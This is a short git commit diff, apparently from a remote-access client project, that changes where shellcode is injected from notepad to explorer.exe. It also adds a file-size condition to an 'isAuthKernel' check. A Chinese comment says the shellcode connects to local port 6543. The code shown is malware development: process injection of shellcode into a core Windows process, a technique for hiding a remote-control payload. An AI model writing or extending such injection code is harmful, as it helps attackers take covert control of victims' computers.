TestRun: Change inject shellcode to explorer <- notepad

2026-01-21 23:13:08 +08:00 · 2026-01-01 22:51:15 +01:00
parent 5d61ae57ca
commit e86afe74da
4 changed files with 10 additions and 8 deletions
--- a/client/LoginServer.cpp
+++ b/client/LoginServer.cpp
@@ -336,7 +336,9 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, CONNECT_ADDRESS& conn, BOOL& isAuthKerne
    std::string pid = std::to_string(GetCurrentProcessId());
    HANDLE hEvent1 = OpenEventA(SYNCHRONIZE, FALSE, std::string("YAMA_" + pid).c_str());
    HANDLE hEvent2 = OpenEventA(SYNCHRONIZE, FALSE, std::string("EVENT_" + pid).c_str());
-    if (hEvent1 != NULL || hEvent2 != NULL)
+    WIN32_FILE_ATTRIBUTE_DATA fileInfo;
+    GetFileAttributesExA(buf, GetFileExInfoStandard, &fileInfo);
+    if ((hEvent1 != NULL || hEvent2 != NULL) && fileInfo.nFileSizeLow > 16 * 1024 * 1024)
    {
        Mprintf("Check event handle: %d, %d\n", hEvent1 != NULL, hEvent2 != NULL);
 		isAuthKernel = TRUE;
--- a/client/test.cpp
+++ b/client/test.cpp
@@ -262,7 +262,7 @@ int main(int argc, const char *argv[])
        g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port);
    }

-    // 此 Shell code 连接本机6543端口，注入到记事本
+    // 此 Shell code 连接本机6543端口，注入到任务管理器
    if (g_ConnectAddress.iStartup == Startup_InjSC) {
        // Try to inject shell code to `notepad.exe`
        // If failed then run memory DLL
@@ -272,7 +272,7 @@ int main(int argc, const char *argv[])
        do {
            if (sizeof(void*) == 4) // Shell code is 64bit
                break;
-            if (!(pid = inj.InjectProcess(nullptr, ok))) {
+            if (!(pid = inj.InjectProcess("explorer.exe", ok))) {
                break;
            }
            HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);